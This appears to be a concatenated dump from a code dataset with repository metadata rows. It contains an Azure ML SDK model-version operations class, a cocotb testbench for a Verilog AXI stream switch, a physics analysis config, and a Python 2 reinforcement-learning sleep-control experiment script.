list.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions"} # type: ignore
@distributed_trace
def delete(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Delete version.
Delete version.
:param name: Container name.
:type name: str
:param version: Version identifier.
:type version: str
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param registry_name: Name of Azure Machine Learning registry.
:type registry_name: str
:keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note
that overriding this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
request = build_delete_request(
name=name,
version=version,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
template_url=self.delete.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore
@distributed_trace
def get(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ModelVersionData"
"""Get version.
Get version.
:param name: Container name. This is case-sensitive.
:type name: str
:param version: Version identifier. This is case-sensitive.
:type version: str
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param registry_name: Name of Azure Machine Learning registry.
:type registry_name: str
:keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note
that overriding this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ModelVersionData, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.ModelVersionData
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType["_models.ModelVersionData"]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
request = build_get_request(
name=name,
version=version,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
template_url=self.get.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("ModelVersionData", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore
def _create_or_update_initial(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
body, # type: "_models.ModelVersionData"
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = self._serialize.body(body, "ModelVersionData")
request = build_create_or_update_request_initial(
name=name,
version=version,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
response_headers = {}
response_headers["x-ms-async-operation-timeout"] = self._deserialize(
"duration", response.headers.get("x-ms-async-operation-timeout")
)
response_headers["Location"] = self._deserialize("str", response.headers.get("Location"))
response_headers["Retry-After"] = self._deserialize("int", response.headers.get("Retry-After"))
if cls:
return cls(pipeline_response, None, response_headers)
_create_or_update_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore
@distributed_trace
def begin_create_or_update(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
body, # type: "_models.ModelVersionData"
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Create or update version.
Create or update version.
:param name: Container name.
:type name: str
:param version: Version identifier.
:type version: str
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param registry_name: Name of Azure Machine Learning registry.
:type registry_name: str
:param body: Version entity to create or update.
:type body: ~azure.mgmt.machinelearningservices.models.ModelVersionData
:keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note
that overriding this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
name=name,
version=version,
resource_group_name=resource_group_name,
registry_name=registry_name,
body=body,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore
def _package_initial(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
body, # type: "_models.PackageRequest"
**kwargs # type: Any
):
# type: (...) -> Optional["_models.PackageResponse"]
cls = kwargs.pop("cls", None) # type: ClsType[Optional["_models.PackageResponse"]]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = self._serialize.body(body, "PackageRequest")
request = build_package_request_initial(
name=name,
version=version,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._package_initial.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
response_headers = {}
if response.status_code == 200:
deserialized = self._deserialize("PackageResponse", pipeline_response)
if response.status_code == 202:
response_headers["Location"] = self._deserialize("str", response.headers.get("Location"))
response_headers["Retry-After"] = self._deserialize("int", response.headers.get("Retry-After"))
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_package_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}/package"} # type: ignore
@distributed_trace
def begin_package(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
body, # type: "_models.PackageRequest"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.PackageResponse"]
"""Model Version Package operation.
Model Version Package operation.
:param name: Container name. This is case-sensitive.
:type name: str
:param version: Version identifier. This is case-sensitive.
:type version: str
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param registry_name: Name of Azure Machine Learning registry.
:type registry_name: str
:param body: Package operation request body.
:type body: ~azure.mgmt.machinelearningservices.models.PackageRequest
:keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note
that overriding this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either PackageResponse or the result of
cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.machinelearningservices.models.PackageResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType["_models.PackageResponse"]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._package_initial(
name=name,
version=version,
resource_group_name=resource_group_name,
registry_name=registry_name,
body=body,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize("PackageResponse", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = ARMPolling(lro_delay, lro_options={"final-state-via": "location"}, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_package.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}/package"} # type: ignore
| [
"[email protected]"
] | |
5770ffe7fdec00cd3c57add6a4c9a57c867b7d78 | 21445827919e574e6150117f9520c5326251c654 | /lib/axis/tb/axis_switch/test_axis_switch.py | 7132a00db6c2daf5401d45cfbca3c819a102aaa4 | [
"MIT"
] | permissive | nyhuang/verilog-ethernet | 0af9b2333f673b1256a26868ce60e946d98be940 | cf832f581cfc43d6eb60af6ec68517f446ed9158 | refs/heads/master | 2023-06-26T04:13:22.530195 | 2021-06-28T08:34:34 | 2021-06-28T08:34:34 | 262,713,491 | 1 | 0 | MIT | 2020-05-10T04:43:45 | 2020-05-10T04:43:44 | null | UTF-8 | Python | false | false | 10,556 | py | #!/usr/bin/env python
"""
Copyright (c) 2021 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import itertools
import logging
import os
import random
import subprocess
import cocotb_test.simulator
import pytest
import cocotb
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge, Event
from cocotb.regression import TestFactory
from cocotbext.axi import AxiStreamBus, AxiStreamFrame, AxiStreamSource, AxiStreamSink
class TB(object):
def __init__(self, dut):
self.dut = dut
s_count = len(dut.axis_switch_inst.s_axis_tvalid)
m_count = len(dut.axis_switch_inst.m_axis_tvalid)
self.log = logging.getLogger("cocotb.tb")
self.log.setLevel(logging.DEBUG)
cocotb.fork(Clock(dut.clk, 10, units="ns").start())
self.source = [AxiStreamSource(AxiStreamBus.from_prefix(dut, f"s{k:02d}_axis"), dut.clk, dut.rst) for k in range(s_count)]
self.sink = [AxiStreamSink(AxiStreamBus.from_prefix(dut, f"m{k:02d}_axis"), dut.clk, dut.rst) for k in range(m_count)]
def set_idle_generator(self, generator=None):
if generator:
for source in self.source:
source.set_pause_generator(generator())
def set_backpressure_generator(self, generator=None):
if generator:
for sink in self.sink:
sink.set_pause_generator(generator())
async def reset(self):
self.dut.rst.setimmediatevalue(0)
await RisingEdge(self.dut.clk)
await RisingEdge(self.dut.clk)
self.dut.rst <= 1
await RisingEdge(self.dut.clk)
await RisingEdge(self.dut.clk)
self.dut.rst <= 0
await RisingEdge(self.dut.clk)
await RisingEdge(self.dut.clk)
async def run_test(dut, payload_lengths=None, payload_data=None, idle_inserter=None, backpressure_inserter=None, s=0, m=0):
tb = TB(dut)
id_count = 2**len(tb.source[s].bus.tid)
cur_id = 1
await tb.reset()
tb.set_idle_generator(idle_inserter)
tb.set_backpressure_generator(backpressure_inserter)
test_frames = []
for test_data in [payload_data(x) for x in payload_lengths()]:
test_frame = AxiStreamFrame(test_data)
test_frame.tid = cur_id
test_frame.tdest = m
test_frames.append(test_frame)
await tb.source[s].send(test_frame)
cur_id = (cur_id + 1) % id_count
for test_frame in test_frames:
rx_frame = await tb.sink[m].recv()
assert rx_frame.tdata == test_frame.tdata
assert rx_frame.tid == test_frame.tid
assert rx_frame.tdest == test_frame.tdest
assert not rx_frame.tuser
assert all(s.empty() for s in tb.sink)
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
async def run_test_tuser_assert(dut, s=0, m=0):
tb = TB(dut)
await tb.reset()
test_data = bytearray(itertools.islice(itertools.cycle(range(256)), 32))
test_frame = AxiStreamFrame(test_data, tuser=1, tdest=m)
await tb.source[s].send(test_frame)
rx_frame = await tb.sink[m].recv()
assert rx_frame.tdata == test_data
assert rx_frame.tuser
assert all(s.empty() for s in tb.sink)
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
async def run_arb_test(dut):
tb = TB(dut)
byte_lanes = tb.source[0].byte_lanes
id_count = 2**len(tb.source[0].bus.tid)
cur_id = 1
await tb.reset()
test_frames = []
length = byte_lanes*16
test_data = bytearray(itertools.islice(itertools.cycle(range(256)), length))
for k in range(5):
test_frame = AxiStreamFrame(test_data, tx_complete=Event())
test_frame.tid = cur_id
test_frame.tdest = 0
src_ind = 0
if k == 0:
src_ind = 0
elif k == 4:
await test_frames[1].tx_complete.wait()
for j in range(8):
await RisingEdge(dut.clk)
src_ind = 0
else:
src_ind = 1
test_frames.append(test_frame)
await tb.source[src_ind].send(test_frame)
cur_id = (cur_id + 1) % id_count
for k in [0, 1, 2, 4, 3]:
test_frame = test_frames[k]
rx_frame = await tb.sink[0].recv()
assert rx_frame.tdata == test_frame.tdata
assert rx_frame.tid == test_frame.tid
assert rx_frame.tdest == test_frame.tdest
assert not rx_frame.tuser
assert all(s.empty() for s in tb.sink)
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
async def run_stress_test(dut, idle_inserter=None, backpressure_inserter=None):
tb = TB(dut)
byte_lanes = tb.source[0].byte_lanes
id_count = 2**len(tb.source[0].bus.tid)
cur_id = 1
await tb.reset()
tb.set_idle_generator(idle_inserter)
tb.set_backpressure_generator(backpressure_inserter)
test_frames = [[list() for y in tb.sink] for x in tb.source]
for p in range(len(tb.source)):
for k in range(128):
length = random.randint(1, byte_lanes*16)
test_data = bytearray(itertools.islice(itertools.cycle(range(256)), length))
test_frame = AxiStreamFrame(test_data)
test_frame.tid = cur_id
test_frame.tdest = random.randrange(len(tb.sink))
test_frames[p][test_frame.tdest].append(test_frame)
await tb.source[p].send(test_frame)
cur_id = (cur_id + 1) % id_count
for lst in test_frames:
while any(lst):
rx_frame = await tb.sink[[x for x in lst if x][0][0].tdest].recv()
test_frame = None
for lst_a in test_frames:
for lst_b in lst_a:
if lst_b and lst_b[0].tid == rx_frame.tid:
test_frame = lst_b.pop(0)
break
assert test_frame is not None
assert rx_frame.tdata == test_frame.tdata
assert rx_frame.tid == test_frame.tid
assert rx_frame.tdest == test_frame.tdest
assert not rx_frame.tuser
assert all(s.empty() for s in tb.sink)
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
def cycle_pause():
return itertools.cycle([1, 1, 1, 0])
def size_list():
data_width = len(cocotb.top.s00_axis_tdata)
byte_width = data_width // 8
return list(range(1, byte_width*4+1))+[512]+[1]*64
def incrementing_payload(length):
return bytearray(itertools.islice(itertools.cycle(range(256)), length))
if cocotb.SIM_NAME:
s_count = len(cocotb.top.axis_switch_inst.s_axis_tvalid)
m_count = len(cocotb.top.axis_switch_inst.m_axis_tvalid)
factory = TestFactory(run_test)
factory.add_option("payload_lengths", [size_list])
factory.add_option("payload_data", [incrementing_payload])
factory.add_option("idle_inserter", [None, cycle_pause])
factory.add_option("backpressure_inserter", [None, cycle_pause])
factory.add_option("s", range(min(s_count, 2)))
factory.add_option("m", range(min(m_count, 2)))
factory.generate_tests()
for test in [run_test_tuser_assert]:
factory = TestFactory(test)
factory.add_option("s", range(min(s_count, 2)))
factory.add_option("m", range(min(m_count, 2)))
factory.generate_tests()
if s_count > 1:
factory = TestFactory(run_arb_test)
factory.generate_tests()
factory = TestFactory(run_stress_test)
factory.add_option("idle_inserter", [None, cycle_pause])
factory.add_option("backpressure_inserter", [None, cycle_pause])
factory.generate_tests()
# cocotb-test
tests_dir = os.path.dirname(__file__)
rtl_dir = os.path.abspath(os.path.join(tests_dir, '..', '..', 'rtl'))
@pytest.mark.parametrize("data_width", [8, 16, 32])
@pytest.mark.parametrize("m_count", [1, 4])
@pytest.mark.parametrize("s_count", [1, 4])
def test_axis_switch(request, s_count, m_count, data_width):
dut = "axis_switch"
wrapper = f"{dut}_wrap_{s_count}x{m_count}"
module = os.path.splitext(os.path.basename(__file__))[0]
toplevel = wrapper
# generate wrapper
wrapper_file = os.path.join(tests_dir, f"{wrapper}.v")
if not os.path.exists(wrapper_file):
subprocess.Popen(
[os.path.join(rtl_dir, f"{dut}_wrap.py"), "-p", f"{s_count}", f"{m_count}"],
cwd=tests_dir
).wait()
verilog_sources = [
wrapper_file,
os.path.join(rtl_dir, f"{dut}.v"),
os.path.join(rtl_dir, "axis_register.v"),
os.path.join(rtl_dir, "arbiter.v"),
os.path.join(rtl_dir, "priority_encoder.v"),
]
parameters = {}
parameters['S_COUNT'] = s_count
parameters['M_COUNT'] = m_count
parameters['DATA_WIDTH'] = data_width
parameters['KEEP_ENABLE'] = int(parameters['DATA_WIDTH'] > 8)
parameters['KEEP_WIDTH'] = parameters['DATA_WIDTH'] // 8
parameters['ID_ENABLE'] = 1
parameters['ID_WIDTH'] = 16
parameters['DEST_WIDTH'] = 8
parameters['USER_ENABLE'] = 1
parameters['USER_WIDTH'] = 1
parameters['S_REG_TYPE'] = 0
parameters['M_REG_TYPE'] = 2
parameters['ARB_TYPE_ROUND_ROBIN'] = 1
parameters['ARB_LSB_HIGH_PRIORITY'] = 1
extra_env = {f'PARAM_{k}': str(v) for k, v in parameters.items()}
sim_build = os.path.join(tests_dir, "sim_build",
request.node.name.replace('[', '-').replace(']', ''))
cocotb_test.simulator.run(
python_search=[tests_dir],
verilog_sources=verilog_sources,
toplevel=toplevel,
module=module,
parameters=parameters,
sim_build=sim_build,
extra_env=extra_env,
)
| [
"[email protected]"
] | |
98f5a7d9ab4b3f578ce6948bda3f56af31438973 | eb42558f56fdb41526cc31ac4ef3a6937bf39e96 | /ConfigDefinitions/UserConfigs/SMHTT_2017_MCOnly_AntiIso_Configs_Deep/WConfig.py | c3c70830e40ca4f509cffad86bf361a53146d0bb | [] | no_license | samhiggie/Jesterworks | 6906b042d3e200efb9bd10b70284ccd30661aa53 | 562e8cbb20d7e4b1d5b9bdba3715578cc66f097d | refs/heads/master | 2020-09-11T19:35:59.770456 | 2019-11-16T12:37:35 | 2019-11-16T12:37:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | from ConfigDefinitions.JesterworksConfigurations import JesterworksConfiguration as Config
from ConfigDefinitions.BranchAdditions.UserDefinedCollections.SMHTT_2017_MC_Data_Collection import MC_Data_Collection as BranchCollection
from ConfigDefinitions.CuttingDefinitions.UserCutConfigs.SMHTT2017Cuts_MC_AntiIso_wDeep import SMHTT2017Cuts as CutConfig
from ConfigDefinitions.EndActionDefinitions.UserConfigs.GrabHistograms import HistogramGrabber as HistogramGrabber
DataConfig = Config()
DataConfig.Path = "/data/ccaillol/smhmt2017_svfitted_12oct/"
DataConfig.Files = ["W.root","W1.root","W2.root","W3.root","W4.root"]
DataConfig.InputTreeName = "mutau_tree"
DataConfig.SampleName = "W"
DataConfig.OutputPath = "/data/aloeliger/SMHTT_Selected_2017_MCOnly_AntiIso_Deep/"
DataConfig.OutputFile = "W.root"
DataConfig.OutputTreeName = 'mt_Selected'
DataConfig.BranchCollection = BranchCollection
DataConfig.CutConfig = CutConfig
DataConfig.EndAction = HistogramGrabber
| [
"[email protected]"
] | |
109a0b28a419817d509d6d4ce27db19a8f90c3ad | 235fcd12177715b51f26715befb7cb1909f27126 | /sleep_control/experiments/arxiv/experiment_QNN_Jan31_2249_LSTM.py | ad1ee787afca6d41b7db4289cd35014ed9d60009 | [] | no_license | xiaogaogaoxiao/dqn4wirelesscontrol | 1d165977f01e263735865e2b6daeed51c4288b01 | 68c2c485e64cef260c0dcb3975a88af4fae97283 | refs/heads/master | 2020-06-16T17:05:45.038089 | 2017-02-10T07:30:12 | 2017-02-10T07:30:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,160 | py | # System built-in modules
import time
from datetime import datetime
import sys
import os
from multiprocessing import Pool
project_dir = "../../"
log_file_name = "msg_QNN_Jan31_2249_LSTM_{}.log".format(sys.argv[1])
sys.path.append(project_dir)
sys_stdout = sys.stdout
# Project dependency modules
import pandas as pd
pd.set_option('mode.chained_assignment', None) # block warnings due to DataFrame value assignment
import lasagne
# Project modules
from sleep_control.traffic_emulator import TrafficEmulator
from sleep_control.traffic_server import TrafficServer
from sleep_control.controller import QController, DummyController, NController
from sleep_control.integration import Emulation
from sleep_control.env_models import SJTUModel
from rl.qtable import QAgent
from rl.qnn_theano import QAgentNN
from rl.mixin import PhiMixin, DynaMixin
# Composite classes
class Phi_QAgentNN(PhiMixin, QAgentNN):
def __init__(self, **kwargs):
super(Phi_QAgentNN, self).__init__(**kwargs)
class Dyna_QAgent(DynaMixin, QAgent):
def __init__(self, **kwargs):
super(Dyna_QAgent, self).__init__(**kwargs)
class Dyna_QAgentNN(DynaMixin, QAgentNN):
def __init__(self, **kwargs):
super(Dyna_QAgentNN, self).__init__(**kwargs)
# load from processed data
session_df =pd.read_csv(
filepath_or_buffer=project_dir+'/sleep_control/data/net_traffic_processed_dh3.dat',
parse_dates=['startTime_datetime', 'endTime_datetime', 'interArrivalDuration_datetime']
)
# Parameters
# |- Agent
# |- QAgent
actions = [(True, None), (False, 'serve_all')]
gamma, alpha = 0.9, 0.9 # TD backup
explore_strategy, epsilon = 'epsilon', 0.02 # exploration
# |- QAgentNN
# | - Phi
phi_length = 15
dim_state = (1, phi_length, 3+2)
range_state_slice = [(0, 10), (0, 10), (0, 10), (0, 1), (0, 1)]
range_state = [[range_state_slice]*phi_length]
# | - No Phi
# phi_length = 0
# dim_state = (1, 1, 3)
# range_state = ((((0, 10), (0, 10), (0, 10)),),)
def f_build_net(input_var=None, input_shape=None, num_outputs=None):
if input_shape is None or num_outputs is None:
raise ValueError('State or Action dimension not given!')
l_in = lasagne.layers.InputLayer(shape=input_shape, input_var=input_var)
d1, d2, d3, d4 = input_shape
l_shp1 = lasagne.layers.ReshapeLayer(l_in, (-1, d3, d4))
l_lstm = lasagne.layers.LSTMLayer(l_shp1, num_units=500, grad_clipping=10, only_return_final=True, precompute_input=True)
l_shp2 = lasagne.layers.ReshapeLayer(l_lstm, (-1, 500))
l_out = lasagne.layers.DenseLayer(
l_shp2, num_units=num_outputs,
nonlinearity=lasagne.nonlinearities.tanh)
return l_out
# | - Other params
momentum, learning_rate = 0.9, 0.01 # SGD
num_buffer, memory_size, batch_size, update_period, freeze_period = 2, 200, 100, 4, 16
reward_scaling, reward_scaling_update, rs_period = 1, 'adaptive', 32 # reward scaling
# |- Env model
model_type, traffic_window_size = 'IPP', 50
stride, n_iter, adjust_offset = 2, 3, 1e-22
eval_period, eval_len = 4, 100
n_belief_bins, max_queue_len = 100, 20
Rs, Rw, Rf, Co, Cw = 1.0, -1.0, -10.0, -5.0, -0.5
traffic_params = (model_type, traffic_window_size,
stride, n_iter, adjust_offset,
eval_period, eval_len,
n_belief_bins)
queue_params = (max_queue_len,)
beta = 0.5 # R = (1-beta)*ServiceReward + beta*Cost
reward_params = (Rs, Rw, Rf, Co, Cw, beta)
# |- DynaQ
num_sim = 5
# |- Env
# |- Time
start_time = pd.to_datetime("2014-10-15 09:40:00")
total_time = pd.Timedelta(days=7)
time_step = pd.Timedelta(seconds=2)
backoff_epochs = num_buffer*memory_size+phi_length
head_datetime = start_time - time_step*backoff_epochs
tail_datetime = head_datetime + total_time
TOTAL_EPOCHS = int(total_time/time_step)
# |- Reward
rewarding = {'serve': Rs, 'wait': Rw, 'fail': Rf}
te = TrafficEmulator(
session_df=session_df, time_step=time_step,
head_datetime=head_datetime, tail_datetime=tail_datetime,
rewarding=rewarding,
verbose=2)
ts = TrafficServer(cost=(Co, Cw), verbose=2)
env_model = SJTUModel(traffic_params, queue_params, reward_params, 2)
# agent = Dyna_QAgentNN(
# env_model=env_model, num_sim=num_sim,
agent = Phi_QAgentNN(
phi_length=phi_length,
dim_state=dim_state, range_state=range_state,
f_build_net = f_build_net,
batch_size=batch_size, learning_rate=learning_rate, momentum=momentum,
reward_scaling=reward_scaling, reward_scaling_update=reward_scaling_update, rs_period=rs_period,
update_period=update_period, freeze_period=freeze_period,
memory_size=memory_size, num_buffer=num_buffer,
# Below is QAgent params
actions=actions, alpha=alpha, gamma=gamma,
explore_strategy=explore_strategy, epsilon=epsilon,
verbose=2)
c = QController(agent=agent)
emu = Emulation(te=te, ts=ts, c=c, beta=beta)
# Heavyliftings
t = time.time()
sys.stdout = sys_stdout
log_path = project_dir + '/sleep_control/experiments/log/'
if os.path.isfile(log_path+log_file_name):
print "Log file {} already exist. Experiment cancelled.".format(log_file_name)
else:
log_file = open(log_path+log_file_name,"w")
print log_file_name + datetime.now().strftime(' [%Y-%m-%d %H:%M:%S] ') + '00%'
time.sleep(1)
sys.stdout = log_file
while emu.epoch is not None and emu.epoch<TOTAL_EPOCHS:
# log time
print "Epoch {},".format(emu.epoch),
left = emu.te.head_datetime + emu.te.epoch*emu.te.time_step
right = left + emu.te.time_step
print "{} - {}".format(left.strftime("%Y-%m-%d %H:%M:%S"), right.strftime("%Y-%m-%d %H:%M:%S"))
emu.step()
print
if emu.epoch%(0.1*TOTAL_EPOCHS)==0:
sys.stdout = sys_stdout
print log_file_name,
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S] ')+'{}0%'.format(10*emu.epoch/TOTAL_EPOCHS)
time.sleep(1)
sys.stdout = log_file
sys.stdout = sys_stdout
log_file.close()
print log_file_name,
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S]'),
print '{:.3f} sec,'.format(time.time()-t),
print '{:.3f} min'.format((time.time()-t)/60)
| [
